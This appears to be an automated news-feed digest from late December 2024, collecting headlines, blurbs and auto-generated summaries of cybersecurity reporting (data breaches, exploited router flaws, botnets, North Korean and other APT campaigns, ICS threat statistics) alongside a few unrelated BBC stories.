    The United States Treasury Department said it suffered a "major cybersecurity incident" that allowed suspected Chinese threat actors to remotely access some computers and unclassified documents.  "On December 8, 2024, Treasury was notified by a third-party software service provider, BeyondTrust, that a threat actor had gained access to a key used by the vendor to secure a cloud-based "

    Autosummary: "


    Data breaches in 2024: Could it get any worse?

    financial
    2024-12-31 https://www.malwarebytes.com/blog/privacy/2024/12/data-breaches-in-2024-could-it-get-any-worse
    An overview of what the year 2024 had to offer in the realm of data breaches: Big ones, sensitive data and some duds "

    Autosummary: Medical information was leaked by the earlier mentioned Change Healthcare breach, but we saw several smaller incidents at providers in the healthcare industry, like Australia’s leading medical imaging provider I-MED Radiology, US- and UK-based healthcare provider DocGo (which offers mobile health services, ambulance services, and remote monitoring for patients), and a nonprofit outpatient provider of treatment for Opioid Use Disorder (OUD). To support this nomination, I will remind you of several high-profile breaches, some of a size almost beyond imagination, some that really left us worried because of the type of data that was stolen, and a few duds. "


    ZAGG disclosed a data breach that exposed its customers’ credit card data

    financial
    2024-12-30 https://securityaffairs.com/172434/data-breach/zagg-credit-card-data-data-breach.html
    ZAGG Inc. notifies customers of credit card data breach, after threat actors hacked a third-party app from its e-commerce provider. ZAGG Inc. disclosed a data breach that exposed its customers’ credit card data after threat actors hacked a third-party application from its e-commerce provider BigCommerce. The company has not disclosed the number of impacted customers were […] "

    Autosummary: Pierluigi Paganini, December 30, 2024. ZAGG Inc. notifies customers of a credit card data breach, after threat actors hacked a third-party app from its e-commerce provider. "


    Barbados fishing industry still reeling from hurricane aftermath

    industry
    2024-12-30 https://www.bbc.com/news/articles/cn7rk0ym68jo
    Hurricane Beryl lashed the island in July, devastating much of its fishing fleet. "

    Autosummary: "Beryl was like a surprise attack, like an ambush," says Cornelius, in a deep baritone voice, over the market's chatter, reggae and thwack of cleavers on chopping boards. "I feel if we can communicate to the global superpowers the pain that we feel seeing this happen to our environment," adds 16-year-old Adrielle Baird, "then it would help them to understand and help us collaborate to find ways to fix the issues that we're seeing." At the Oistins Fish Market in Bridgetown, flying fish are still available, along with marlin, mahi-mahi and tuna, though only a handful of stalls are open. "


    The sixth sense of cybersecurity: How AI spots threats before they strike

    ciber
    2024-12-30 https://www.helpnetsecurity.com/2024/12/30/vineet-chaku-reaktr-ai-ai-powered-cybersecurity/

    In this Help Net Security interview, Vineet Chaku, President of Reaktr.ai, discusses how AI is transforming cybersecurity, particularly in anomaly detection and threat identification. Chaku talks about the skills cybersecurity professionals need to collaborate with AI systems and address the ethical concerns surrounding deployment.

    The post The sixth sense of cybersecurity: How AI spots threats before they strike appeared first on Help Net Security.

    "

    Autosummary: AI systems need a lot of data to function, raising concerns about how that data is collected, stored, and used. We need to develop skills in areas like figuring out how threats might affect AI systems, understanding how to protect against attacks that target AI itself, and working with AI to develop stronger security strategies. "


    Cybercriminals tighten their grip on organizations

    ciber
    2024-12-30 https://www.helpnetsecurity.com/2024/12/30/cybercrime-threat-2024/

    Cybercriminals are using a variety of new methods to target organizations across industries. In this article, we examine the most pressing trends and findings from the 2024 surveys on the growing threat of cybercrime. Social engineering scams sweep through financial institutions North American financial institutions fielded 10 times more reports of social engineering scams in 2024 than they did a year ago. Account-opening fraud declined by nearly 60% in the last year, as banks implemented additional controls, … More

    The post Cybercriminals tighten their grip on organizations appeared first on Help Net Security.

    "

    Autosummary: Fraudsters primarily used text messages (50%), fake websites (48%), social media (37%), hacking (31%), BEC scams (31%) and deepfakes (11%) to dupe organizations. Malware families such as Gafgyt (3.12%), Mirai (2.09%), and Bedevil (1.84%) appeared less often than in prior years, which may be a reflection of attempts to neutralize botnets from propagating. "


    Threat actors attempt to exploit a flaw in Four-Faith routers

    exploits
    2024-12-30 https://securityaffairs.com/172450/hacking/four-faith-routers-flaw-exploited.html
    VulnCheck researchers warn that threat actors are attempting to exploit a high-severity vulnerability impacting some Four-Faith routers. Cybersecurity firm VulnCheck warns that a high-severity flaw, tracked as CVE-2024-12856 (CVSS score: 7.2), in Four-Faith routers is actively exploited in the wild. The vulnerability is an operating system (OS) command injection vulnerability that impacts Four-Faith router models F3x24 and […] "

    Autosummary: Pierluigi Paganini, December 30, 2024. VulnCheck researchers warn that threat actors are attempting to exploit a high-severity vulnerability impacting some Four-Faith routers. "


    ⚡ THN Weekly Recap: Top Cybersecurity Threats, Tools and Tips

    ciber
    2024-12-30 https://thehackernews.com/2024/12/thn-weekly-recap-top-cybersecurity_0611565081.html
    Every week, the digital world faces new challenges and changes. Hackers are always finding new ways to breach systems, while defenders work hard to keep our data safe. Whether it's a hidden flaw in popular software or a clever new attack method, staying informed is key to protecting yourself and your organization. In this week's update, we'll cover the most important developments in "

    Autosummary: The list includes — CVE-2024-56337 (Apache Tomcat), CVE-2024-45387 (Apache Traffic Control), CVE-2024-43441 (Apache HugeGraph-Server), CVE-2024-52046 (Apache MINA), CVE-2024-12856 (Four-Faith routers), CVE-2024-47547, CVE-2024-48874, and CVE-2024-52324 (Ruijie Networks) 📰 Around the Cyber World ScreenConnect Used to Deploy AsyncRAT — Microsoft has revealed that cybercriminals are leveraging tech support scams to deploy AsyncRAT through the remote monitoring and management (RMM) software ScreenConnect, the first time that ScreenConnect is used to deploy malware, instead of as a persistence or lateral movement tool. "However, the fact that one of the previous CARR administrators, "MotherOfBears," has joined NoName057(16), the continuous forwarding of CARR posts, and previous statements, suggest that both groups seem to collaborate closely, which can also indicate a cooperation with Sandworm Team." At a larger scale, if an adversary is able to write Group Policy Objects (GPOs), then they would be able to distribute this policy throughout the domain and systematically stop most, if not all, security solutions on all endpoints in the domain, potentially allowing for the deployment of post-exploitation tooling and/or ransomware. A lesser number of victims have been recorded in Belarus, Canada, Moldova, Israel, Kyrgyzstan, Turkey, and Vietnam. "In late-May 2024, the actors likely used this access to manipulate a legitimate transaction request by a DMM employee, resulting in the loss of 4,502.9 BTC, worth $308 million at the time of the attack," authorities said. "The new Convention against Cybercrime will enable faster, better-coordinated, and more effective responses, making both digital and physical worlds safer," the UN said. "


    Hackers exploit Four-Faith router flaw to open reverse shells

    exploits
    2024-12-30 https://www.bleepingcomputer.com/news/security/hackers-exploit-four-faith-router-flaw-to-open-reverse-shells/
    Threat actors are exploiting a post-authentication remote command injection vulnerability in Four-Faith routers tracked as CVE-2024-12856 to open reverse shells back to the attackers. [...] "

    Autosummary: Flaw details and scope CVE-2024-12856 is an OS command injection flaw impacting Four-Faith router models F3x24 and F3x36, typically deployed in energy and utilities, transportation, telecommunications, and manufacturing sectors. "


    Cisco states that the second data leak is linked to the one from October

    government
    2024-12-30 https://securityaffairs.com/172460/data-breach/cisco-second-data-leak-linked-to-october-one.html
    Cisco confirmed the authenticity of the 4GB of leaked data, which was compromised in a recent security breach, marking it as the second leak in the incident. “We are […] "

    Autosummary: IntelBroker claimed to have gained access to Github projects, Gitlab Projects, SonarQube projects, Source code, hard coded credentials, Certificates, Customer SRCs, Confidential Documents, Jira tickets, API tokens, AWS Private buckets, company Technology SRCs, Docker Builds, Azure Storage buckets, Private & Public keys, SSL Certificates, Cisco Premium Products, and other info. "


    China-linked APT Salt Typhoon breached a ninth U.S. telecommunications firm

    Telcos
    2024-12-29 https://securityaffairs.com/172425/apt/salt-typhoon-breached-ninth-u-s-telco.html
    A White House official confirmed that China-linked threat actor Salt Typhoon breached a ninth U.S. telecommunications company. A White House official confirmed that the China-linked APT group Salt Typhoon has breached a ninth U.S. telecoms company as part of a cyberespionage campaign aimed at telco firms worldwide. “A White House official said Friday the US […] "

    Autosummary: “The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal Bureau of Investigation (FBI), Australian Signals Directorate’s (ASD’s) "


    SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 26

    exploits
    2024-12-29 https://securityaffairs.com/172418/uncategorized/security-affairs-malware-newsletter-round-26.html
    Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. Now You See Me, Now You Don’t: Using LLMs to Obfuscate Malicious JavaScript; Analyzing Malicious Intent in Python Code: A Case Study; DigiEver Fix That IoT Thing!; Botnets Continue to Target Aging D-Link Vulnerabilities; OtterCookie, […] "

    Autosummary: "


    Malware botnets exploit outdated D-Link routers in recent attacks

    exploits
    2024-12-29 https://www.bleepingcomputer.com/news/security/malware-botnets-exploit-outdated-d-link-routers-in-recent-attacks/
    Two botnets tracked as "Ficora" and "Capsaicin" have recorded increased activity in targeting D-Link routers that have reached end of life or are running outdated firmware versions. [...] "

    Autosummary: The list of targets includes popular D-Link devices used by individuals and organizations such as DIR-645, DIR-806, GO-RT-AC750, and DIR-845L. For initial access, the two pieces of malware use known exploits for CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112. "


    Lost city found by accident and a fly's brain mapped: 2024's scientific wins

    government
    2024-12-29 https://www.bbc.com/news/articles/cm2v1rl32j8o
    Moments to celebrate included a solar eclipse seen by millions and a lost city discovered by accident. "

    Autosummary: Lost city found by accident and a fly's brain mapped: 2024's scientific wins Reuters A "chopsticks" rocket catch by Elon Musk's SpaceX was among the highlights of 2024 A total solar eclipse seen by millions, a lost jungle city discovered by accident and hope for the almost extinct northern white rhino - science has given us a lot to get excited about this year. Conservation slowed nature loss Robin Moore/Re:wild Cuban crocodiles at a breeding sanctuary - one of a number of conservation actions studied With human activity driving what conservation charity the World Wide Fund for Nature (WWF) calls a "catastrophic" loss of species, it can sometimes feel like we don't hear an awful lot of good news about nature. Getty Images There are no pictures of the city but it had pyramid temples similar to this one in nearby Calakmul In the city, which had disappeared under jungle canopy in Mexico, archaeologists found pyramids, sports fields and amphitheatres. "


    15,000+ Four-Faith Routers Exposed to New Exploit Due to Default Credentials

    exploits
    2024-12-28 https://thehackernews.com/2024/12/15000-four-faith-routers-exposed-to-new.html
    A high-severity flaw impacting select Four-Faith routers has come under active exploitation in the wild, according to new findings from VulnCheck. The vulnerability, tracked as CVE-2024-12856 (CVSS score: 7.2), has been described as an operating system (OS) command injection bug affecting router models F3x24 and F3x36. The severity of the shortcoming is lower due to the fact that it only works "

    Autosummary: "


    North Korea actors use OtterCookie malware in Contagious Interview campaign

    exploits
    2024-12-28 https://securityaffairs.com/172382/malware/north-korea-linked-actors-using-ottercookie-backdoor.html
    North Korea-linked threat actors are using the OtterCookie backdoor to target software developers with fake job offers. North Korea-linked threat actors were spotted using new malware called OtterCookie as part of the Contagious Interview campaign that targets software developer community with fake job offers. The Contagious Interview campaign was first detailed by Palo Alto Networks […] "

    Autosummary: North Korea actors use OtterCookie malware in Contagious Interview campaign Pierluigi Paganini December 28, 2024 North Korea-linked threat actors are using the OtterCookie backdoor to target software developers with fake job offers. "


    Watch: Huge waves strike Peruvian coastline

    latam
    2024-12-28 https://www.bbc.com/news/videos/cvg6zrvdq7qo
    Videos show waves reported to be up to four metres high upending boats and deluging towns. "

    Autosummary: "


    Overwhelmed by fraud? Here’s how financial pros fight back

    financial
    2024-12-27 https://www.helpnetsecurity.com/2024/12/27/patrick-harding-ping-identity-financial-fraud-future/

    In this Help Net Security interview, Patrick Harding, Chief Architect at Ping Identity, discusses the growing threat of deepfake-related fraud and its impact on financial security. He also discusses overlooked vulnerabilities in digital banking and offers advice for organizations to protect themselves from fraud in the coming years.

    The post Overwhelmed by fraud? Here’s how financial pros fight back appeared first on Help Net Security.

    "

    Autosummary: From an organizational perspective, leaders can always lean on external partners to provide guidance on deploying verifiable credentials, biometric systems, and layered intelligence to build a resilient zero trust architecture, tailored to the specific needs of their business. AI technology continues to become more sophisticated, so organizations’ understanding of their systems’ vulnerabilities, awareness of these threats, and technology in place to combat them need to be taken extremely seriously. "


    FICORA and Kaiten Botnets Exploit Old D-Link Vulnerabilities for Global Attacks

    exploits
    2024-12-27 https://thehackernews.com/2024/12/ficora-and-kaiten-botnets-exploit-old-d.html
    Cybersecurity researchers are warning about a spike in malicious activity that involves roping vulnerable D-Link routers into two different botnets, a Mirai variant dubbed FICORA and a Kaiten (aka Tsunami) variant called CAPSAICIN. "These botnets are frequently spread through documented D-Link vulnerabilities that allow remote attackers to execute malicious commands via a GetDeviceSettings "

    Autosummary: Randomize the victim hosts' nickname; NICK - Change the nickname of the victim host; SERVER - Change command-and-control server; ENABLE - Enable the bot; KILL - Kill the session; GET - Download a file; VERSION - Requests version of the victim host; IRC - Forward a message to the server; SH - Execute shell commands; ISH - Interact with victim host's shell; SHD - Execute shell command and ignore signals; INSTALL - Download and install a binary to "/var/bin"; BASH - Execute commands using bash; BINUPDATE - Update a binary to "/var/bin" via get; LOCKUP - Kill Telnet backdoor and execute the malware instead; HELP - Display help information about the malware; STD - Flooding attack with random hard-coded strings for the port number and target specified by the attacker; UNKNOWN - UDP flooding attack with random characters for the port number and target specified by the attacker; HTTP - HTTP flooding attack. "


    Brazilian citizen charged for threatening to release data stolen from a company in 2020

    latam
    2024-12-27 https://securityaffairs.com/172362/hacking/brazilian-citizen-extortion-attempt.html
    A Brazilian citizen faces U.S. charges for allegedly threatening to release data stolen from a company in a March 2020 security breach. The U.S. government has charged the Brazilian citizen Junior Barros De Oliveira, 29, with allegedly threatening to release data stolen from a company during a March 2020 security breach. De Oliveira was charged […] "

    Autosummary: "


    Cloud Atlas Deploys VBCloud Malware: Over 80% of Targets Found in Russia

    exploits
    2024-12-27 https://thehackernews.com/2024/12/cloud-atlas-deploys-vbcloud-malware.html
    The threat actor known as Cloud Atlas has been observed using a previously undocumented malware called VBCloud as part of its cyber attack campaigns targeting "several dozen users" in 2024. "Victims get infected via phishing emails containing a malicious document that exploits a vulnerability in the formula editor (CVE-2018-0802) to download and execute malware code," Kaspersky researcher Oleg "

    Autosummary: The malware is equipped to harvest information about disks (drive letter, drive type, media type, size, and free space), system metadata, files and documents matching extensions DOC, DOCX, XLS, XLSX, PDF, TXT, RTF, and RAR, and files related to the Telegram messaging app. "


    Hackers exploit DoS flaw to disable Palo Alto Networks firewalls

    exploits
    2024-12-27 https://www.bleepingcomputer.com/news/security/hackers-exploit-dos-flaw-to-disable-palo-alto-networks-firewalls/
    Palo Alto Networks is warning that hackers are exploiting the CVE-2024-3393 denial of service vulnerability to disable firewall protections by forcing it to reboot. [...] "

    Autosummary: "


    Cybersecurity firm's Chrome extension hijacked to steal users' data

    ciber
    2024-12-27 https://www.bleepingcomputer.com/news/security/cybersecurity-firms-chrome-extension-hijacked-to-steal-users-data/
    At least five Chrome extensions were compromised in a coordinated attack where a threat actor injected code that steals sensitive information from users. [...] "

    Autosummary: Among Cyberhaven's customers are Snowflake, Motorola, Canon, Reddit, AmeriHealth, Cooley, IVP, Navan, DBS, Upstart, and Kirkland & Ellis. "


    White House links ninth telecom breach to Chinese hackers

    Telcos
    2024-12-27 https://www.bleepingcomputer.com/news/security/white-house-links-ninth-telecom-breach-to-chinese-hackers/
    A White House official has added a ninth U.S. telecommunications company to the list of telecoms breached in a Chinese hacking campaign that impacted dozens of countries. [...] "

    Autosummary: "


    North Korean Hackers Deploy OtterCookie Malware in Contagious Interview Campaign

    exploits
    2024-12-27 https://thehackernews.com/2024/12/north-korean-hackers-deploy-ottercookie.html
    North Korean threat actors behind the ongoing Contagious Interview campaign have been observed dropping a new JavaScript malware called OtterCookie. Contagious Interview (aka DeceptiveDevelopment) refers to a persistent attack campaign that employs social engineering lures, with the hacking crew often posing as recruiters to trick individuals looking for potential job opportunities into "

    Autosummary: In September 2024, Singaporean cybersecurity company Group-IB documented the first major revision to the attack chain, highlighting the use of an updated version of BeaverTail that adopts a modular approach by offloading its information-stealing functionality to a set of Python scripts collectively tracked as CivetQ. It's worth noting at this stage that Contagious Interview is assessed to be disparate from Operation Dream Job, another long-running North Korean hacking campaign that also employs similar job-related decoys to trigger the malware infection process. "


    Service disruptions continue to blindside businesses

    ransomware
    2024-12-26 https://www.helpnetsecurity.com/2024/12/26/service-disruptions-concern/

    Service disruptions remain a critical concern for IT and business executives, with 88% of respondents saying they believe another major incident will occur in the next 12 months, according to PagerDuty. PagerDuty surveyed 1,000 IT and business executives who were director level and above, from the US, UK, Australia and Japan. Organizations must focus on preventing service disruptions. 86% of executives surveyed now realize that they have been prioritizing security at the expense of readiness … More

    The post Service disruptions continue to blindside businesses appeared first on Help Net Security.

    "

    Autosummary: Nearly half in the US (48%), Australia (48%), and the UK (47%), along with a majority in Japan (53%) believe that limited access to real-time data tools will further hinder their organizations during an outage, if approaches to service disruption are not prioritized. "


    Cybersecurity spending trends and their impact on businesses

    ciber
    2024-12-26 https://www.helpnetsecurity.com/2024/12/26/cybersecurity-budget-insights-2024/

    Managing cybersecurity and IT budgets is a critical element of organizational strategy. With increasing threats to data security, the rise of ransomware, and the need to protect IT infrastructure, organizations must invest wisely in cybersecurity to stay secure. This article shares key insights from cybersecurity budget surveys conducted in 2024. Despite massive security spending, 44% of CISOs fail to detect breaches. Despite global information security spending projected to reach $215 billion in 2024, 44% of … More

    The post Cybersecurity spending trends and their impact on businesses appeared first on Help Net Security.

    "

    Autosummary: The top three areas of investment for 2024 cybersecurity budgets are internal security assessments (60%), identity and access management (IAM) programs (58%) and the acquisition of additional cybersecurity tools (51%). "


    iOS devices more exposed to phishing than Android

    financial
    2024-12-26 https://www.helpnetsecurity.com/2024/12/26/mobile-devices-attacks/

    The mobile threat landscape continues to grow at an alarming rate as cybercrime groups shift their tactics and target mobile devices in the early stages of their attacks, according to a recent Lookout report. The report highlights insights behind a 17% increase QoQ (quarter on quarter) in enterprise-focused credential theft and phishing attempts, 32% increase QoQ in malicious app detections and a trend showing iOS devices are more exposed to phishing attacks than Android devices. … More

    The post iOS devices more exposed to phishing than Android appeared first on Help Net Security.

    "

    Autosummary: With the commoditization of advanced malware, evolution of nation-state mobile malware capabilities, and a heavy reliance on mobile-focused social engineering, organizations today must have advanced mobile threat defense as part of their security strategy. "


    APT and financial attacks on industrial organizations in Q3 2024

    financial industry
    2024-12-26 https://ics-cert.kaspersky.com/publications/apt-and-financial-attackson-industrial-organizationsin-q3-2024/
    During the quarter, a number of research papers and technical advisories were published detailing attacks that either targeted or affected organizations in the industrial sector. From our perspective, the following are likely to be the most interesting for researchers and useful for cybersecurity practitioners "

    Autosummary: Chinese-speaking activity. APT41 attacks: According to Mandiant researchers, the threat actor APT41 (aka Barium, Wicked Panda, Wicked Spider, Earth Baku, Axiom, Blackfly, Brass Typhoon, Bronze Atlas, HOODOO, Red Kelpie, TA415 and Winnti) launched data exfiltration attacks against global shipping and logistics, media, technology and automotive sectors, primarily in Italy, Spain, Taiwan, Thailand, Turkey and the UK. Since its inception in February 2024, RansomHub has encrypted and exfiltrated data from at least 210 victims from sectors including water and wastewater, information technology, government services and facilities, healthcare and public health, emergency services, food and agriculture, financial services, commercial facilities, critical manufacturing, transportation, communications, and critical infrastructure. They believe Unit 29155 is responsible for targeting the Ukrainian government, critical infrastructure organizations, and key resource sectors, including the government services, financial services, transportation systems, energy, and healthcare sectors of NATO members, the EU, as well as Central American and Asian countries. The group has been active since at least 2018 and targets organizations and individuals in Colombia, Ecuador, Chile, Panama, and other Latin American countries, focusing on various sectors, including government, finance, energy, oil and gas. SloppyLemming attacks: According to Cloudflare, the threat actor SloppyLemming (aka Outrider Tiger) has been targeting organizations in the government, law enforcement, energy, education, telecoms and technology sectors in Pakistan, Bangladesh, Sri Lanka, Nepal and China. In addition, it has the functionality to steal credentials from Outlook, browsers, crypto wallets, Telegram and Steam sessions, Discord tokens, password managers, data from Windows Credential Manager and Windows Vault, as well as read the list of active processes and installed applications.
Southeast Asia and Korean Peninsula. Andariel attacks: The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal Bureau of Investigation (FBI) and other authoring partners published a Cybersecurity Advisory on July 25 focusing on the state-sponsored cybergroup known publicly as Andariel, Onyx Sleet (formerly PLUTONIUM), DarkSeoul, Silent Chollima, and Stonefly/Clasiopa. CLNTEND, first detected in April 2024, is a remote access tool (RAT) that supports a wider range of network protocols for communication, including TCP, HTTP, HTTPS, TLS, and SMB (port 445). Using these tools, the group managed to carry out a number of new attacks against various Russian facilities: an instrumentation manufacturer, a polymer materials plant, a mechanical plant, a technology park, a leasing company, an oil and gas company, and an IT company. Nevertheless, some network activity from the botnet has been detected over the last four years targeting critical sectors in the USA and Taiwan, including military, government, higher education, telecoms, defense industrial base, and IT. The affiliates then moved laterally inside the network using methods such as RDP, PsExec, AnyDesk, Connectwise, N-Able, Cobalt Strike, Metasploit, and others. Data exfiltration has been observed through the use of tools such as PuTTY, Amazon AWS S3 buckets/tools, HTTP POST requests, WinSCP, Rclone, Cobalt Strike, Metasploit, and other methods.
The CMoon worm, which spread through the compromised website of a Russian energy company, and the TIDRONE/Operation WordDrone attacks, which appear to be either supply chain attacks or exploiting a vulnerability in an ERP product to gain initial access to the victim’s systems, reiterate the point that these widely discussed attack vectors, in which a third-party service is compromised by the attacker to infect other systems, should by no means be excluded from the threat models of modern industrial enterprises. Organizations in the USA, UK, Netherlands, Cyprus, Sweden, Germany, Singapore, Hong Kong and Australia have been targeted. For other tasks, Head Mare primarily uses publicly available software in its attacks, such as Sliver (the main C2 framework for attackers), ngrok, rsockstun (both used for pivoting), XenAllPasswordPro, and Mimikatz. This service enables a full range of activities, including scalable bot exploitation, vulnerability and exploit management, remote management of C2 infrastructure, file uploads and downloads, remote command execution, and the ability to tailor IoT-based DDoS attacks at scale. The authoring agencies identified the threat actor as primarily targeting defense, aerospace, nuclear, and engineering organizations in the USA, Japan, South Korea, and India. The APT group is known for using spear phishing to impersonate government agencies or banking institutions to distribute various publicly available Trojans, such as AsyncRAT, BitRAT, Lime RAT, NjRAT, Quasar RAT, and Remcos RAT. Files containing saved passwords, cookies, bookmarks, browsing history, and information for autofilling forms, including credit card information, could be collected from web browsers.
RansomHub attacks: The US Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Multi-State Information Sharing and Analysis Center (MS-ISAC), and Department of Health and Human Services (HHS) issued a joint Cybersecurity Advisory (CSA) on August 29 containing information relevant to the RansomHub ransomware-as-a-service (RaaS) group (formerly known as Cyclops and Knight). Middle East-related activity. Peach Sandstorm attacks: Between April and July, Microsoft researchers observed the Peach Sandstorm threat actor (aka APT33, Elfin and Refined Kitten) deploy a new custom multi-stage backdoor dubbed Tickler in attacks against the satellite, communications equipment and oil and gas sectors, as well as federal and state government sectors in the USA and UAE. "


    New "OtterCookie" malware used to backdoor devs in fake job offers

    exploits
    2024-12-26 https://www.bleepingcomputer.com/news/security/new-ottercookie-malware-used-to-backdoor-devs-in-fake-job-offers/
    North Korean threat actors are using new malware called OtterCookie in the Contagious Interview campaign that is targeting software developers. [...] "

    Autosummary: The researchers observed shell commands that perform data theft (e.g. collecting cryptocurrency wallet keys, documents, images, and other valuable information). "


    Windows 11 installation media bug causes security update failures

    exploits
    2024-12-26 https://www.bleepingcomputer.com/news/security/windows-11-installation-media-bug-causes-security-update-failures/
    Microsoft is warning of an issue when using a media support to install Windows 11, version 24H2, that causes the operating system to not accept further security updates. [...] "

    Autosummary: "


    Brazilian Hacker Charged for Extorting $3.2M in Bitcoin After Breaching 300,000 Accounts

    latam
    2024-12-26 https://thehackernews.com/2024/12/brazilian-hacker-charged-for-extorting.html
    A Brazilian citizen has been charged in the United States for allegedly threatening to release data stolen by hacking into a company's network in March 2020. Junior Barros De Oliveira, 29, of Curitiba, Brazil has been charged with four counts of extortionate threats involving information obtained from protected computers and four counts of threatening communications, the U.S. Department of "

    Autosummary: "


    A ransomware attack disrupted services at Pittsburgh Regional Transit

    exploits ransomware
    2024-12-26 https://securityaffairs.com/172333/cyber-crime/pittsburgh-regional-transit-ransomware-attack.html
    A ransomware attack on Pittsburgh Regional Transit (PRT) was the root cause of the agency’s service disruptions. On December 23, 2024, Pittsburgh Regional Transit (PRT) announced it was actively responding to a ransomware attack that was first detected on Thursday, December 19. Pittsburgh Regional Transit (PRT) is the public transportation agency that serves the Pittsburgh […] "

    Autosummary: A ransomware attack disrupted services at Pittsburgh Regional Transit Pierluigi Paganini December 26, 2024 A ransomware attack on Pittsburgh Regional Transit (PRT) was the root cause of the agency’s service disruptions. "


    Panama's president calls Trump's Chinese canal claim "nonsense"

    latam
    2024-12-26 https://www.bbc.com/news/articles/c8rj11ne68eo
    The president-elect has threatened to take back control of the Panama Canal, alleging Chinese interference. "

    Autosummary: "


    Threat landscape for industrial automation systems. Regions, Q3 2024

    industry
    2024-12-25 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-regions-q3-2024/
    The percentage of ICS computers on which malicious objects were blocked decreased from the second quarter to 22%. But the figure increased in Africa, South Asia, South-East Asia, the Middle East, Latin America, and East Asia. Regionally, the percentage ranged from 9.7% in Northern Europe to 31.5% in Africa. "

    Autosummary: Comparative analysis: Latin America occupies leading positions among regions by percentage of ICS computers on which the following were blocked: first place – malicious documents; second place – malicious scripts and phishing pages, threats from email clients. Threat categories: compared to global figures, the region has a higher percentage of ICS computers on which the following threat categories were blocked: malicious documents, 2.1 times higher; malicious scripts and phishing pages, 1.4 times higher; spyware, 1.2 times higher; web miners, 1.1 times higher. Threat sources: the region ranked second in the world by percentage of ICS computers on which malicious threats from email clients were blocked, exceeding the global average by 1.8 times.
Comparative analysis: Southern Europe occupies leading positions among regions by percentage of ICS computers on which the following were blocked: first place – threats from email clients; second place – malicious documents; third place – malicious scripts and phishing pages. Threat categories: compared to the global average, the region has a higher percentage of ICS computers on which the following were blocked: malicious documents, 1.7 times higher; spyware, 1.4 times higher; malicious scripts and phishing pages, 1.3 times higher; ransomware, 1.3 times higher. Threat sources: Southern Europe ranked first in the world by percentage of ICS computers where malicious threats from email clients were blocked, surpassing the global average by 2 times.
Comparative analysis: in Q3 2024, Central Asia occupied leading positions among regions by percentage of ICS computers on which the following were blocked: first place – miner executable files for Windows; second place – worms. Threat categories: compared to the global average, the region has a higher percentage of ICS computers on which the following were blocked: miners in the form of executable files for Windows, 2.3 times higher; worms, 2.2 times higher; ransomware, 1.1 times higher; spyware, 1.1 times higher. Threat sources: the percentage of ICS computers on which threats from removable devices were blocked exceeded the global average by 1.4 times in Q3 2024.
Threat categories: compared to the global average, the region has a noticeably higher percentage of ICS computers on which the following were blocked: web miners, 1.4 times higher; spyware, 1.3 times higher; miners in the form of executable files for Windows, 1.1 times higher; malicious documents, 1.1 times higher; worms, 1.1 times higher. Threat sources: in Q3 2024, East Asia ranked first again among the regions by percentage of ICS computers where malicious threats from network folders were blocked, surpassing the global average by 2.7 times.
Industries: the most affected industries in the region, as selected for this report, are construction and building automation. Compared to the respective global averages, the following industries had a significantly higher percentage of ICS computers with blocked malicious objects: manufacturing – 1.5 times higher; construction – 1.4 times; electric power – 1.3 times; building automation – 1.2 times higher; engineering and ICS integration – 1.2 times. In Q3 2024, all selected sectors experienced an increase in the percentage of ICS computers where malicious objects were blocked. Threat categories: compared to the global figures, the region has a higher percentage of ICS computers on which the following were blocked: web miners, 1.4 times higher; spyware, 1.3 times higher; miners in the form of executable files for Windows, 1.1 times higher; malicious documents, 1.1 times higher; worms, 1.1 times higher. Threat sources: threats from email clients exceeded the global average by 1.5 times.
Threat categories: compared to the global figures, the region has a significantly higher percentage of ICS computers on which the following were blocked: AutoCAD malware, 6.9 times higher; viruses, 5.4 times higher; spyware, 1.4 times higher; malicious scripts and phishing pages, 1.3 times higher; worms, 1.3 times higher; malicious documents, 1.2 times higher. Threat sources: the region ranked second in the world by percentage of ICS computers on which threats from network folders were blocked, exceeding the global average by 2.6 times.
Specifically, the following threat categories showed significantly higher values: ransomware, 1.8 times higher; worms, 1.7 times higher; spyware, 1.6 times higher; web miners, 1.6 times higher; viruses, 1.3 times higher; malicious scripts and phishing pages, 1.3 times higher; malicious documents, 1.3 times higher. Threat sources: the region ranked third in the world by percentage of ICS computers on which threats from internet and email clients were blocked, exceeding the global average by a factor of 1.1 and 1.7 respectively. Industries: compared to the respective global averages, the following industries had a significantly higher percentage of ICS computers with blocked malicious objects: construction – 1.7 times higher; manufacturing – 1.6 times higher; engineering & ICS integration – 1.5 times higher; oil & gas – 1.4 times higher; electric power – 1.4 times higher. In Q3 2024, all selected sectors in the region, except oil & gas, exhibited an increase in the percentage of ICS computers on which malicious objects were blocked.
Comparative analysis: Africa occupies leading positions among regions by percentage of ICS computers on which the following were blocked: first place – denylisted internet resources, malicious scripts and phishing pages, spyware, worms, threats from internet and removable devices; second place – web miners, ransomware, viruses. Threat categories: compared to global figures, the region has a higher percentage of ICS computers on which threats were blocked across all threat categories: ransomware, 1.8 times higher; spyware, 1.7 times higher; denylisted internet resources, 1.6 times higher; web miners, 1.4 times higher; malicious scripts and phishing pages, 1.4 times higher; malware for AutoCAD, 1.4 times higher. Threat sources: the region ranked first in the world by percentage of ICS computers on which threats from internet and removable devices were blocked, exceeding the global average by 1.4 times and 4.6 times respectively. Industries: compared to the respective global averages, the following sectors in the region saw a higher percentage of ICS computers on which malicious objects were blocked: electric power, 1.3 times higher; construction, 1.2 times higher. In Q3 2024, all sectors, except for manufacturing, exhibited an increase in the percentage of ICS computers on which malicious objects were blocked.
Comparative analysis: South Asia occupies leading positions among regions by percentage of ICS computers on which the following were blocked: second place – threats from removable devices; third place – miners in the form of executable files for Windows, ransomware, threats from network folders. Threat categories: compared to the global average, the region has a noticeably higher percentage of ICS computers on which the following were blocked: worms, 1.4 times higher.
Comparative analysis. Threat categories: compared to the global average, the region has a noticeably higher percentage of ICS computers on which the following were blocked: malicious scripts and phishing pages – 1.2 times higher; malicious documents – 1.1 times higher. Threat sources: the percentage of ICS computers on which threats from email clients were blocked surpassed the global average by a factor of 1.1. "
